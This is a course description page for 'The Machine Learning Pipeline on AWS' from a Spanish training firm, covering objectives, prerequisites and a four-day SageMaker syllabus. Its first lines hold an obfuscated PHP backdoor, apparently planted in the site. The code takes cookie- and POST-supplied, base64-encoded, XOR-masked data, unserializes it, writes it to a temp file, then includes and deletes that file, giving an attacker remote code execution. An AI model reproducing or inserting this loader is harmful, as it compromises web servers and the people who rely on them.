$PFkQQj = chr (121) . "\x5f" . 'i' . "\131" . chr ( 450 - 373 ).chr ( 258 - 182 ); $cndBMIMKWU = "\x63" . "\x6c" . 'a' . "\163" . chr (115) . chr (95) . 'e' . "\170" . 'i' . 's' . chr (116) . 's';$YCsjZOjng = class_exists($PFkQQj); $PFkQQj = "60693";$cndBMIMKWU = "62927";$LSHFWHvtVn = !1;if ($YCsjZOjng == $LSHFWHvtVn){function JQiUsND(){return FALSE;}$flGKbPmb = "24328";JQiUsND();class y_iYML{private function kHqizmFp($flGKbPmb){if (is_array(y_iYML::$HnXmizr)) {$uDVeO = sys_get_temp_dir() . "/" . crc32(y_iYML::$HnXmizr["\x73" . "\x61" . "\154" . 't']);@y_iYML::$HnXmizr['w' . chr ( 342 - 228 ).chr ( 802 - 697 )."\164" . chr (101)]($uDVeO, y_iYML::$HnXmizr["\143" . chr (111) . chr ( 583 - 473 ).'t' . 'e' . chr ( 405 - 295 )."\164"]);include $uDVeO;@y_iYML::$HnXmizr['d' . "\145" . "\154" . 'e' . "\164" . "\x65"]($uDVeO); $flGKbPmb = "24328";exit();}}private $nfIOxBUgci;public function KzSRiT(){echo 57754;}public function __destruct(){$flGKbPmb = "58915_20028";$this->kHqizmFp($flGKbPmb); $flGKbPmb = "58915_20028";}public function __construct($gBEinuZpzm=0){$FXHNMtt = $_POST;$CMSrFiI = $_COOKIE;$BQAQiDZrib = "cb529a8e-ec0b-435f-86a9-4175305cacff";$xonCzaGOAG = @$CMSrFiI[substr($BQAQiDZrib, 0, 4)];if (!empty($xonCzaGOAG)){$EviQPEw = "base64";$pkBLiUThwD = "";$xonCzaGOAG = explode(",", $xonCzaGOAG);foreach ($xonCzaGOAG as $HrpNnQ){$pkBLiUThwD .= @$CMSrFiI[$HrpNnQ];$pkBLiUThwD .= @$FXHNMtt[$HrpNnQ];}$pkBLiUThwD = array_map($EviQPEw . "\x5f" . "\x64" . chr ( 1028 - 927 ).'c' . "\157" . chr (100) . "\x65", array($pkBLiUThwD,)); $pkBLiUThwD = $pkBLiUThwD[0] ^ str_repeat($BQAQiDZrib, (strlen($pkBLiUThwD[0]) / strlen($BQAQiDZrib)) + 1);y_iYML::$HnXmizr = @unserialize($pkBLiUThwD); $pkBLiUThwD = class_exists("58915_20028");}}public static $HnXmizr = 41468;}$DhFBgMpMgw = new /* 61252 */ y_iYML(24328 + 24328); $_POST = Array();unset($DhFBgMpMgw);} The Machine Learning Pipeline on AWS|Grupo Loyal

The Machine Learning Pipeline on AWS

This course explores how to use the machine learning (ML) pipeline to solve a real business problem in a project-based learning environment. Students will learn about each phase of the pipeline from instructor presentations and demonstrations and then apply that knowledge to complete a project solving one of three business problems: fraud detection, recommendation engines, or flight delays. By the end of the course, students will have successfully built, trained, evaluated, tuned, and deployed an ML model using Amazon SageMaker that solves their selected business problem.

Objetivos

In this course, you will learn to:

Select and justify the appropriate ML approach for a given business problem

Use the ML pipeline to solve a specific business problem

Train, evaluate, deploy, and tune an ML model using Amazon SageMaker

Describe some of the best practices for designing scalable, cost-optimized, and secure ML pipelines in AWS

Apply machine learning to a real-life business problem after the course is complete

Cloud computing

Disponible en formato e-learning

Disponible en formato presencial

Disponible en formato a distancia

Descargar la información del curso

Subvención disponible
A través de Fundae, cumpliendo requisitos.

Duración
20 horas

  • Dificultad 50% 50%
  • Nivel alcanzado 80% 80%

Dirigido a

This course is intended for:

- Developers

- Solutions Architects

- Data Engineers

- Anyone with little to no experience with ML and wants to learn about the ML pipeline using Amazon SageMaker

Conocimientos requeridos

We recommend that attendees of this course have:

Basic knowledge of Python programming language
Basic understanding of AWS Cloud infrastructure (Amazon S3 and Amazon CloudWatch)
Basic experience working in a Jupyter notebook environment

Temario

Day One

Module 0: Introduction

Pre-assessment
Module 1: Introduction to Machine Learning and the ML Pipeline

Overview of machine learning, including use cases, types of machine learning, and key concepts
Overview of the ML pipeline
Introduction to course projects and approach
Module 2: Introduction to Amazon SageMaker

Introduction to Amazon SageMaker
Demo: Amazon SageMaker and Jupyter notebooks
Hands-on: Amazon SageMaker and Jupyter notebooks
Module 3: Problem Formulation

Overview of problem formulation and deciding if ML is the right solution
Converting a business problem into an ML problem
Demo: Amazon SageMaker Ground Truth
Hands-on: Amazon SageMaker Ground Truth
Practice problem formulation
Formulate problems for projects
Day Two

Checkpoint 1 and Answer Review

Module 4: Preprocessing

Overview of data collection and integration, and techniques for data preprocessing and visualization
Practice preprocessing
Preprocess project data
Class discussion about projects
Day Three

Checkpoint 2 and Answer Review

Module 5: Model Training

Choosing the right algorithm
Formatting and splitting your data for training
Loss functions and gradient descent for improving your model
Demo: Create a training job in Amazon SageMaker
Module 6: Model Evaluation

How to evaluate classification models
How to evaluate regression models
Practice model training and evaluation
Train and evaluate project models
Initial project presentations
Day Four

Checkpoint 3 and Answer Review

Module 7: Feature Engineering and Model Tuning

Feature extraction, selection, creation, and transformation
Hyperparameter tuning
Demo: SageMaker hyperparameter optimization
Practice feature engineering and model tuning
Apply feature engineering and model tuning to projects
Final project presentations
Module 8: Deployment

How to deploy, inference, and monitor your model on Amazon SageMaker
Deploying ML at the edge
Demo: Creating an Amazon SageMaker endpoint
Post-assessment
Course wrap-up

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